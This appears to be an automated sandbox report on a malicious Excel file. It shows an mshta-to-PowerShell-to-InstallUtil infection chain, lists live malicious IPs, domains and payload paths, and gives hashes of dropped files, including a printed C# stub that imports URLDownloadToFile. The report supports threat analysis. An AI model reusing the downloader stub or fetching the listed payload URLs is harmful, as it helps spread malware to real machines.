                • Execution Graph export aborted for target mshta.exe, PID 3828 because there are no executed functions
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                Time | Type | Description
                03:29:56 | API Interceptor | 74x Sleep call for process: mshta.exe modified
                03:30:00 | API Interceptor | 159x Sleep call for process: powershell.exe modified
                03:30:14 | API Interceptor | 3904387x Sleep call for process: InstallUtil.exe modified
                Input: Office document (Model: gpt-4o)
                Output:
                ```json
                {
                  "riskscore": 9,
                  "reasons": "The screenshot contains a visually prominent Microsoft Office logo and text stating 'This document is protected,' which can mislead users into thinking it is a legitimate document. The instructions provided create a sense of urgency by stating 'Open the document in Microsoft Office' and 'If this document was downloaded from your email, please click Enable Editing from the yellow bar above.' This language is designed to prompt immediate action. The use of a well-known brand (Microsoft Office) adds to the credibility of the document, increasing the likelihood of users following the instructions without suspicion. The sense of urgency is directly connected to the prominent instructions, making it highly likely that the document is designed to deceive users into enabling potentially harmful content."
                }
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link (context listed below each row)
                91.92.245.100 | MV ENISHI V.53Y.xls | Get hash | malicious | Unknown | Browse
                • 91.92.245.100/W1007T/csrss.exe
                107.173.143.46 | Quotation.xls | Get hash | malicious | Remcos | Browse
                • 107.173.143.46/T2307W/csrss.exe
                107.173.143.46 | Quotation.xls | Get hash | malicious | Remcos | Browse
                • 107.173.143.46/T1607W/csrss.exe
                107.173.143.46 | gdfvr.hta | Get hash | malicious | Cobalt Strike | Browse
                • 107.173.143.46/M1507T/csrss.exe
                107.173.143.46 | Quotation.xls | Get hash | malicious | Unknown | Browse
                • 107.173.143.46/M1507T/csrss.exe
                188.114.96.3 | xptRc4P9NV.exe | Get hash | malicious | Unknown | Browse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                188.114.96.3 | LisectAVT_2403002B_448.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                188.114.96.3 | LisectAVT_2403002B_89.exe | Get hash | malicious | CobaltStrike | Browse
                • cccc.yiuyiu.xyz/config.ini
                188.114.96.3 | 54.xls | Get hash | malicious | FormBook | Browse
                • tny.wtf/
                188.114.96.3 | Order_490104.xls | Get hash | malicious | Unknown | Browse
                • tny.wtf/vb
                188.114.96.3 | Order_490104.xls | Get hash | malicious | Unknown | Browse
                • tny.wtf/vb
                188.114.96.3 | Scan copy.xls | Get hash | malicious | Unknown | Browse
                • tny.wtf/3VC
                188.114.96.3 | Order_490104.xls | Get hash | malicious | Unknown | Browse
                • tny.wtf/vb
                188.114.96.3 | SEL1685129 AMANOS.pdf.exe | Get hash | malicious | Azorult, GuLoader | Browse
                • bshd1.shop/OP341/index.php
                188.114.96.3 | S0042328241130.xls | Get hash | malicious | Remcos | Browse
                • tny.wtf/v0na
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link (context listed below each row)
                tny.wtf | ÖDEME TAVSİYESİ.xls | Get hash | malicious | Remcos | Browse
                • 188.114.97.3
                tny.wtf | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse
                • 188.114.97.3
                tny.wtf | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse
                • 188.114.97.3
                tny.wtf | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse
                • 188.114.97.3
                tny.wtf | PO S0042328241130.xls | Get hash | malicious | Remcos | Browse
                • 188.114.97.3
                tny.wtf | Scan copy.xls | Get hash | malicious | Unknown | Browse
                • 188.114.97.3
                tny.wtf | 54.xls | Get hash | malicious | FormBook | Browse
                • 188.114.97.3
                tny.wtf | Order_490104.xls | Get hash | malicious | Unknown | Browse
                • 188.114.96.3
                tny.wtf | Scan copy.xls | Get hash | malicious | Unknown | Browse
                • 188.114.97.3
                tny.wtf | Order_490104.xls | Get hash | malicious | Unknown | Browse
                • 188.114.96.3
                geoplugin.net | LisectAVT_2403002A_101.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | LisectAVT_2403002A_407.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | LisectAVT_2403002A_431.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | IAENMAIL-A4-240717-0830-000090912_PDF.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | CDG__ Copia de Pagamento.pdf.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | CFS-0682-2-08 Order.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe | Get hash | malicious | Remcos, DBatLoader | Browse
                • 178.237.33.50
                geoplugin.net | remcos.exe | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | ogetback.doc | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                geoplugin.net | S0042328241130.xls | Get hash | malicious | Remcos | Browse
                • 178.237.33.50
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                THEZONEBGLisectAVT_2403002A_62.exeGet hashmaliciousRedLineBrowse
                • 91.92.248.117
                LisectAVT_2403002A_97.exeGet hashmaliciousDarkVision RatBrowse
                • 91.92.244.17
                67#U2464.htaGet hashmaliciousUnknownBrowse
                • 91.92.244.191
                LisectAVT_2403002B_73.exeGet hashmaliciousXmrigBrowse
                • 91.92.248.9
                IJ8PamwVuJ.exeGet hashmaliciousXmrigBrowse
                • 91.92.248.9
                https://ffb-bk.com?id=0119818877107560047Get hashmaliciousUnknownBrowse
                • 91.92.251.205
                cLPbKg0oEK.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                • 91.92.244.238
                July17_Payment43TR_D0812_U48927_H09824_W3892_K5087_F5902_DU8927_R491.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                • 91.92.255.36
                JCrqNf4UY3.elfGet hashmaliciousGafgytBrowse
                • 91.92.255.190
                A4ZSgdgW5Z.elfGet hashmaliciousGafgytBrowse
                • 91.92.255.190
                AS-COLOCROSSINGUS#U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                • 172.245.123.11
                2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                • 198.46.174.139
                DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 107.174.69.116
                LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                • 108.174.60.238
                042240724.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                CLOUDFLARENETUSinvoice.docx.docGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.auGet hashmaliciousHTMLPhisherBrowse
                • 104.17.64.14
                new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                • 172.64.41.3
                zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                • 162.159.61.3
                N#U00b0025498563-.pdfGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                6Vm1Ii4ASz.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):15189
                Entropy (8bit):5.0343247648743
                Encrypted:false
                SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                MD5:7BC3FB6565E144A52C5F44408D5D80DF
                SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                Malicious:false
                Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.34726597513537405
                Encrypted:false
                SSDEEP:3:Nlll:Nll
                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
                Category:modified
                Size (bytes):155101
                Entropy (8bit):2.413658699503682
                Encrypted:false
                SSDEEP:768:tZ6A3yXNA0AGAJUm7TggPjM1LhT7OgPgKf/Yg5QiXAZO:tPcp7we
                MD5:2C663F0E924C1B0773B65541F610DC2F
                SHA1:B6684F3EE0E305913B7B638F640CDB8A9BD7E3EF
                SHA-256:7D605835426F27A6FD60B5180B82F2B30AB498C860CF3CBB28B1D3FB32C58042
                SHA-512:501A33112CD28B8033A29562FF4B76DD9E57E49E7D848775FD5D3554E8B18C44A8B9AA459C61A529A9E556DFD73F154B15AC1DF475BBABF87E6335F051E3D6D3
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta, Author: Joe Security
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):2673152
                Entropy (8bit):7.219441527091625
                Encrypted:false
                SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
                MD5:4FB3E6E7B8F9C12CD2D5E161F7B94760
                SHA1:57BDAD62C6EA7F1B905C900302F918D185811A94
                SHA-256:F76F9B85DF2BA8850BEC058164D2C752C8FD8EF0F1BCFFD793E5F453D8A839BB
                SHA-512:F762AD1CCD537D06C1CF3538E433671F441F100B06D37EC34B3A3E76DFBFAD40AC7CA50EE32297C54F628B0B89D75C2C5255166CC992F9BCFF8F117F70AA179A
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 22%, Browse
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):962
                Entropy (8bit):5.013811273052389
                Encrypted:false
                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                Malicious:false
                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3267664
                Entropy (8bit):4.082704780373106
                Encrypted:false
                SSDEEP:12288:A1J5JK5z3QGnjhjIwguslwv2WXKcnXfxp6ZamUknaN9HRo1tWwE1qCD8dt3iGnjF:An5qz3YwyaGb1swEwCat3wwKuWh1OwG
                MD5:F9C857D816E009A9156490C428628ED4
                SHA1:9DB00D7B2DFDDB8E9F27A405F5648E50F38B426E
                SHA-256:748FF1D68ABB7C846A6523DA96CFC391F4157BEEDECE2154442DE656D208B4D9
                SHA-512:56CCAD7C8B4223F314206F3624A6B72F951EC7BF9E0FB3290AF1FC5914A394F98740F1BFEA205253FBBB236359B56A96244F605BFD892AAC7A81FE6504D85068
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3115944
                Entropy (8bit):3.99329520179585
                Encrypted:false
                SSDEEP:12288:Y1XKPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWw6D8dt3iGnjPjIp:YdKOR30wOSKx1Ow6at3wwKuWh1Own
                MD5:FBBB8E9329014CA73ED2E670C8853EFD
                SHA1:2F0AEDA9EAB65719760250474A879619E4FBB24D
                SHA-256:F16E8FFEFB183EB65B9EDC76BD56C3CCEA0D0E21743D5B771C8965D58BCCAA55
                SHA-512:1DA3B868B682608BB76A38B2FE3AF65ADEDD9775A7A824A495E595C6117F46D679AF6CC6ABD1835E47E0F270F51AA8D2BCE7562249CE7B81951B9D20F0C89A9F
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3268792
                Entropy (8bit):4.078124759248305
                Encrypted:false
                SSDEEP:12288:x1E5MT523tGnjmjIwgusmwvpWXKcnXfxp7ZaTUkmaNoHko1CWwf1ExD8dt3iGnju:xi5e23gwyqyK1Bwf6xat3wwKuWh1Ow9
                MD5:D6E4983047BA5360C7AA0AABB151AD23
                SHA1:D3065FF6710DCE2EB4979BDBAAB0D827C3C90658
                SHA-256:0539F341B361AE77722D7E39B2201B420906261AD4A9204F026E990A060A6444
                SHA-512:31593D79E5DEE108800A2778451E31298EA5E7848340116CB5EE1D614707F4832C984BD5CCFD35E99BBDBD457177CD1A49764B77C90D9E03E3A3FDB417BD53D2
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:05 2024, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):4.008737946689376
                Encrypted:false
                SSDEEP:24:HUe9E2UspV3dHtwKdNWI+ycuZhNTakS1PNnqSqd:02VNuKd41ulTa3vqSK
                MD5:AB52A44E1DBD12392D65CF748BDF6840
                SHA1:179AE224D9B694B9FD611E765878F51F45F2505D
                SHA-256:4B10C74D10FF27B79DDC411D1EEF73935B5389B06F3E8F203FCF73CFF20BF8B5
                SHA-512:0E9FD76D70D7E067EF9CE34E4BBB18907F5AF3C398AD4C6F8558650491385CC94E6924B2A6E2D4847E8B106F9C2AAA082993E0AC34FE8581A659664C7CC6756E
                Malicious:false
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:24 2024, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):3.973537964768451
                Encrypted:false
                SSDEEP:24:H/e9EurU/RHRwKdNwI+ycuZhNjakS1PNnqSqd:mr8RaKdm1ulja3vqSK
                MD5:0E036F24B59072DA73D83AF4564C9C48
                SHA1:A46A86CF7742C8E5A01ED5BC3C0E931C768EB41F
                SHA-256:A962C4A9DC49C87FB6B5FF850AC98A58DCBABCDF66645E71F71C98C38E4CB716
                SHA-512:8852CC7A7602A5430B72007FF1D07F7286763509A83C9416A17D172C7E64B21F7DB054C4CB473D0F46C862F85AB1FAD5777C42A7E40CA6773432511A9D90EC57
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.1115540893862033
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxak7Ynqq1PN5Dlq5J:+RI+ycuZhNjakS1PNnqX
                MD5:D554E2139BA0386F6860D660577D2234
                SHA1:4A32BA16DDF55937A94434DEDDF5BE61993916B3
                SHA-256:710CF5805F2D308F77F945DF898759DC6116C3C5D645C99EBF161CFE04B688AB
                SHA-512:7B74A03169A510E03F99A3DEF399F92FA00E6F6A4E2CC4B0E135FA2B671E626035F8A4D1D0ADBBAC6D3C3A53DB6ED5D446EF60DAB704003C74626C4319EE9863
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                Category:dropped
                Size (bytes):456
                Entropy (8bit):3.792698188963493
                Encrypted:false
                SSDEEP:6:V/DsYLDS81zuSH0bMGffQXReKJ8SRHy4HiBSrYC9Zf/cy5RBEwdKy:V/DTLDfu8NXfHesUgZfEy5R6y
                MD5:D92562BB10C45A8479C6F2CA27D4AAD2
                SHA1:BF719A03FAF19275B3B660779EB3CFDBDA6D4ED5
                SHA-256:3D8E3A49C0BAADE4D70A96B0BC4C30053324AAF4564EDAC2FC547AA1AD123A83
                SHA-512:4C8FDDB52B3032872EEB96DA904AE6040CCF542526BE4DAF53EBDAB975DC9400B38D0153DDA5DD0DA4D1D372F2711D6617BE05F6B7208CB46603FC6F1C95DC39
                Malicious:false
                Preview:.using System;.using System.Runtime.InteropServices;..namespace yAjTPtp.{. public class db. {. [DllImport("urlmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rMXvyTlVqF,string o,string PCg,uint kFvGXqEtgN,IntPtr Hx);.. }..}.
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.243328085731964
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fOWUi1JUzxs7+AEszIP23fOWUit:p37Lvkmb6KzxdJUWZEoxF
                MD5:ABA44177075CED1F024E448C732F78D6
                SHA1:515169E3A5F072586BBC5FF7595AD976E2E83C86
                SHA-256:BCFC515D4E30459E54753B23793CF589E719AF7FEE0ECA688DA70DA4E81DE80B
                SHA-512:7DA3349D183D3F8BE21793441FAAA6E0F5CC6BB16A6724179BBDF6BE85301C275130ECE4B27CBF142FAACB1F9DEB8CA3CF67183716807051B4C33DD301CDFAC4
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs"
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3072
                Entropy (8bit):2.8152291486162806
                Encrypted:false
                SSDEEP:24:etGStJ2J2F8y7vUWukDqZCa0lxjqHRDtkZflVC+WI+ycuZhNjakS1PNnqI:6eUecVIClxjqxiJlVCl1ulja3vqI
                MD5:CC34C9F6E5F6C738AA77D61927BE692B
                SHA1:5B4666C41D24068E25BFBCCD6D3F0D45BADDED71
                SHA-256:508B5459D88240D555F2AF6D865BF2C7D89350277EEBBE74C5CD3799D7956DF0
                SHA-512:F8D1C444A04E25F96590ECBB8C1A72969D8EE49F26E6ADB31EA5521390E2F007670A13000C9A97D206B5F4F6A041FDE0196B200CDBA052A92E547485D6854E80
                Malicious:true
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                Category:modified
                Size (bytes):866
                Entropy (8bit):5.335894104439047
                Encrypted:false
                SSDEEP:24:AId3ka6Kzv/EoqKaMD5DqBVKVrdFAMBJTH:Akka60v/EoqKdDcVKdBJj
                MD5:9B3FB45D00474A20D24AC07AB7FBDA74
                SHA1:BF5D059B8B06F1B1720ACD40F4A6EBDE8923D943
                SHA-256:55D8F5A4FF01EA33C66102CF280A3750159392E9CBAA5841571BE3F5BC99A17A
                SHA-512:CA22022D632390015EF1C28926E671BAF68BA9EB91AC92F3FCB5E2DBD223487B21C9390434D6EBD0B23068890B9CF2EE9B3E8089574D157B78FD09DA3BD6A8C6
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.117766434260039
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhak7Ynqq1PN5Dlq5J:+RI+ycuZhNTakS1PNnqX
                MD5:85EC6F49CAF295BA694B993C0FB08FFC
                SHA1:B015D920D64D3E1E7244D2D8316FC64709BF96D3
                SHA-256:A7882C2B6742B4461A67CCD8388626A49E25C718815CBA14F87E5A02EEEAD51C
                SHA-512:5F889E48AD8252EE9BACD13D50475C0AA1DBEAFFE78A1D09246D9D0AD42D894E6BDC1FE1BF979548F94419674AC395E9F61E2A692965404B553981F4B66819E5
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                Category:dropped
                Size (bytes):456
                Entropy (8bit):3.792698188963493
                Encrypted:false
                SSDEEP:6:V/DsYLDS81zuSH0bMGffQXReKJ8SRHy4HiBSrYC9Zf/cy5RBEwdKy:V/DTLDfu8NXfHesUgZfEy5R6y
                MD5:D92562BB10C45A8479C6F2CA27D4AAD2
                SHA1:BF719A03FAF19275B3B660779EB3CFDBDA6D4ED5
                SHA-256:3D8E3A49C0BAADE4D70A96B0BC4C30053324AAF4564EDAC2FC547AA1AD123A83
                SHA-512:4C8FDDB52B3032872EEB96DA904AE6040CCF542526BE4DAF53EBDAB975DC9400B38D0153DDA5DD0DA4D1D372F2711D6617BE05F6B7208CB46603FC6F1C95DC39
                Malicious:false
                Preview:.using System;.using System.Runtime.InteropServices;..namespace yAjTPtp.{. public class db. {. [DllImport("urlmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rMXvyTlVqF,string o,string PCg,uint kFvGXqEtgN,IntPtr Hx);.. }..}.
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.29055883369608
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyQ/wzxs7+AEszIP23fyQ/CAn:p37Lvkmb6KzNYWZEoNV
                MD5:AD10F7C12BAED4FA659152D5700DA72C
                SHA1:A9EB49EDF27D77233207F1E092F402656F448C70
                SHA-256:ADC907B376C5065186EB6F7ADB484A0F24CF58E9FDC79292415110FFF896B082
                SHA-512:7DCD87623BCE49BE5900DC817EA0046B1AE6998D486FDC61313C9E5433B1940D18842C38873D218A3489DE05B52D2A7F0C7359F03FF39874BC3031713922F589
                Malicious:true
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs"
